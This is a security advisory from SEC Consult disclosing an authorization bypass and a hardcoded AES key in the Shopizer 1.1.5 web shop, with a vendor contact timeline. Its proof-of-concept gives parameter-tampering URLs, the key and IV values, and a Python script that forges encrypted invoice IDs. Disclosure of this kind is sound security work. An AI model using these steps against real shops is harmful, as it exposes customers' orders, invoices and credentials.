SEC Consult SA-20140710-1 :: Multiple high risk vulnerabilities
--EvLSKgUNw4f0GsBCUxq3wFN6lJemOkVBD
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: quoted-printable
SEC Consult Vulnerability Lab Security Advisory < 20140710-1 >
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
title: Multiple high risk vulnerabilities in Shopizer websh=
op
product: Shopizer
vulnerable version: 1.1.5 and below
fixed version: v2 (new codebase)
impact: high
homepage: http://www.shopizer.com/
found: 2012-09-04
by: K. Gudinavicius
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Vendor description:
-------------------
Shopizer is an open source java shopping cart and e-commerce content
management software (CMS). The system is built on Struts 2, Hibernate and=
Spring. JQuery ui and ajax are heavily used on the ui as well as DWR and
Struts2-jQuery plug-in. (http://www.shopizer.com/)
Vulnerability overview/description:
-----------------------------------
Shopizer is prone to the following high risk vulnerabilities:
1) Authentication/authorization bypass
The authentication and authorization mechanism provided by the web applic=
ation
is prone to an authentication/authorization bypass vulnerability, which c=
an be
easily exploited by remote attackers for gaining access to private
information. Malicious actions can be performed by directly calling inter=
nal
methods which are supposed to be accessed only by authenticated and permi=
tted
users.
2) Hardcoded default encryption key
A default encryption key is used across all versions of the Shopizer. It =
can't
be changed, for example, by editing a configuration file, because it's
hardcoded in the source code of the web application. The default encrypti=
on
key can be used to encrypt special values allowing access to the sensitiv=
e
information.
Proof of concept:
-----------------
1) Authentication/authorization bypass
The viewFiles method is vulnerable to authentication bypass. By changing =
the
value of the orderId parameter (e.g. by incrementing it) it is possible t=
o
access and download ordered files of other users. This means that a malic=
ious
user can completely bypass the checkout process and even he doesn't need =
an
account in order to gain access to the data that is sold on the target
website. In the following example files of the order with the ID 61 will =
be
accessed.
/shop/checkout/viewFiles.action?orderId=3D61
The removeReview method is vulnerable to authorization bypass. An
authenticated user can remove arbitrary product reviews by changing the v=
alue
of the reviewId parameter (e.g. by incrementing it). The following URL wi=
ll
remove the product review with the ID 398.
/shop/profile/removeReview.action?reviewId=3D398
2) Hardcoded default encryption key
The hardcoded default encryption key is 1000000000000000
(SecurityConstants.java) and the default initialization vector is
fedcba9876543210 (EncryptionUtil.java). Both values were extracted from t=
he
publicly available versions of the Shopizer. The following is the source =
code
of a Python script that can be used to decrypt and encrypt arbitrary valu=
es by
using the extracted keys.
from Crypto.Cipher import AES
from binascii import unhexlify
import sys
mode =3D AES.MODE_CBC
size =3D AES.block_size
pad =3D lambda s: s + (size - len(s) % size) * chr(size - len(s) % size)
def decrypt(ciphertext):
ciphertext=3Dunhexlify(ciphertext)
decryptor =3D AES.new('1000000000000000', mode,'fedcba9876543210')
plain =3D decryptor.decrypt(ciphertext)
print repr(plain)
def encrypt(plaintext):
sample=3Dpad(plaintext)
encryptor =3D AES.new('1000000000000000', mode,'fedcba9876543210')
plain =3D encryptor.encrypt(sample)
print plain.encode('hex')
if __name__=3D=3D'__main__':
if len(sys.argv)<3:
print "Usage: %s encrypt|decrypt text" % sys.argv[0]
sys.exit(1)
elif sys.argv[1]=3D=3D'decrypt':
decrypt(sys.argv[2])
elif sys.argv[1]=3D=3D'encrypt':
encrypt(sys.argv[2])
The tool can be used to gain access to the invoices of other users. The
prepareSimpleInvoice action takes encrypted value of the order number tha=
t is
incremental. For example, to gain access to the invoice of the 57 order t=
he
57|0 string must be encrypted:
C:\>python aes.py encrypt "57|0"
0664567580f32d3398a981cf51285057
The encrypted string is then used as a value for the fileId parameter of =
the
following URL:
/shop/cart/prepareSimpleInvoice.action?fileId=3D0664567580f32d339=
8a981cf51285057
Other parts of the web application such as passwords and ordered files al=
so
depend on the same encryption keys. If an attacker is able to gain access=
to
the database where encrypted user credentials are stored, he can easily
decrypt and use them in the further attacks.
Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in version 1.1.5 of Shopi=
zer,
which is the most recent version at the time of discovery.
Vendor contact timeline:
------------------------
2012-01-10: The vulnerabilities have been found during a short blackbox t=
est
of a shopizer installation during a customer project
2012-12-20: Customer allows contacting vendor
2013-01-10: Contacting vendor through support@shopizer.com, fast reply,
sending advisory
2013-01-22: Asking for status update, reply: vendor takes a look
2013-02-26: Asking for status update, vendor has some questions regarding=
version numbers
2013-03-22: Asking for status update again
2013-03-23: Vendor: Release 2 is scheduled for June
2013-06-25: Asking for status update, no answer
2013-07-01: Sending deadline for advisory release
2013-07-07: Vendor: Version 2 of shopizer delayed
2013-07-08: Asking for new release date
2013-07-09: Vendor: moving from Struts to Spring & Spring security
2013-10-03: Asking again for release date
2013-10-06: Vendor: Release shortly
2013-12-10: Asking for update
2013-12-12: Vendor: Release date set for January 2014
2014-06: Vendor releases v2
2014-07-10: SEC Consult releases security advisory
Solution:
---------
Using the old version branch 1.x is not recommended as there are no secur=
ity
fixes implemented by the vendor.
Version 2 has been released by the vendor, but it has not been tested by =
SEC Consult
and it is unclear whether the issues have been solved.
Workaround:
-----------
-
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF K. Gudinavicius / @2012, 2013, 2014
--EvLSKgUNw4f0GsBCUxq3wFN6lJemOkVBD
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: OpenPGP digital signature
Content-Disposition: attachment; filename="signature.asc"
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2
iQEcBAEBAgAGBQJTvmTXAAoJECyFJyAEdlkKjhYIAKKzVKvFnN86p1E4YaaCN+68
O3fvTwR6DFfomT3BU8McaogS38XmDFL9jy9DWTBDkutt0ABOX6qZKy0jTVpL1bRr
dQScMaFUDY6DKUe1voBmVpvy4rAAZe0iVcSsGitHKJ1/Cgml3CgDhekUXp+SDNng
CEtyOEEz0T8KWPuS9ECkTbkIroIlkMLWduB5Fvpf9I6YGnE9zZUPbtyuhpMQlyUR
2GPMKK7fWy1ySdedGTiPRUYXXcdA25C6tKqSYqhjdbxZvmmeWOO3xGlrpakeFhtS
5tOTW4CTyT3uEfYJSqGUtJoZ8nymz63Q2jkQlC53QvWqrpZyDubPMTnzh0p3sRc=
=TsrG
-----END PGP SIGNATURE-----
--EvLSKgUNw4f0GsBCUxq3wFN6lJemOkVBD--